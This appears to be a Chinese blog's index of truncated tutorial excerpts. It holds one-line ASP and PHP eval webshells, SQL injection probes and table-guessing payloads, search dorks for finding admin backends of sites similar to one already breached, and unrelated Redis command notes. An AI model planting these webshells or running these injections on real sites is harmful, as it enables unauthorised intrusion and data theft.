网上已经有类似的代码,但是效率很低,以下代码非常快速完成。本人在支付宝免签中使用以下方式。            //获取浏览器的cookies             string Webcookies = webBrowse
搭建模拟环境了解一句话木马的原理.(1).创建1.asp文件,代码如下:        <%eval request("value")%>       (2).创建2.php文件,代码如下:         <?php @eval(
首先看看基本的数据库表结构: 文章表:   id(文章id)  title(文章内容)   content(文章内容) 用户表:   id(用户id)  username(用户名)    password(用户密码)然后看看注入:    某个文章的链接如下:http://localhost/article.php?id=1,其SQL查询:select   title , content from
刚刚看完51cto的视频,实验发现思路不错但是不完美.首先看看下面的语句,意思是从tp_goods表筛选数据按照表中第一个字段排序SELECT   * from tp_goods  ORDER BY 1再首先看看下面的语句,意思是从tp_goods表筛选数据按照筛选的字段的第一个字段排序SELECT   id,title from tp_goods 
intitle:搜索网页标题包含的关键字intext:搜索网页正文包含的关键字或者词site:对特定的站点进行搜索inurl:对url的关键词进行搜索cache:缓存filetype:对特定的文件以上支持组合,例如查询某个网站后台(非100%有效,前提是搜索引擎已经记录)intitle:后台   stie:gaojiufeng.cn 成功入侵一个网站可以通过搜索引擎快速找到同样的站点
前面已经讲了关于是否存在注入点的说明.现在讲下关于阿D注入和明小子检测存在注入猜表猜字段的原理.(使用工具一定要知道工具原理,方便后期自己完善/开发工具)1.猜表的方法:http://xxx.com/ProductShow.asp?articleid=143 and exists(select * from [user])    //查询是否存在user表http://xxx.com/ProductShow.asp?articleid=143 and exists(selec
SQL注入是因为开发者没有过滤GET/POST的参数导致参数传入mysql语句拼接成注入语句导致.网上很多作者使用and 1=1   and 1=2来检测是否可以注入.例如http://xxxxxx.com/ProductShow.asp?articleid=143(详细地址不透漏.)ProductShow.asp用于显示指定的文章id的文章内容,其文件内容可能是:<% id=Request.QueryString("id") select&nbs
集合的性质: 唯一性,无序性,确定性注: (1).在string和link的命令中,可以通过range 来访问string中的某几个字符或某几个元素但,因为集合的无序性,无法通过下标或范围来访问部分元素.(2).集合中不会出现重复的值因此想看元素,要么随机选一个,要么全选1.sadd key  value1 value2     作用: 往集合key中增加元素2.srem value1 value2    
1.lpush key value  作用: 把值插入到链接头部(左边)2.rpush key value  作用: 把值插入到链接尾部(右边)3.lrange key start  stop 作用: 返回链表中[start ,stop]中的元素 规律: 左数从0开始,右数从-1开始4.lrange key 0  -1  作用:查看全部的链表5.lrem key count value 作用: 从key链表中删除 value值 注: 删除coun
1.set key value [ex 秒数] / [px 毫秒数]  [nx] /[xx]如: set a 1 ex 10 , 10秒有效Set a 1 px 9000  , 9秒有效注: 如果ex,px同时写,以后面的有效期为准如 set a 1 ex 100 px 9000, 实际有效期是9000毫秒nx: 表示key不存在时,执行操作xx: 表示key存在时,执行操作eg:set   site  www.so.com    ex
Top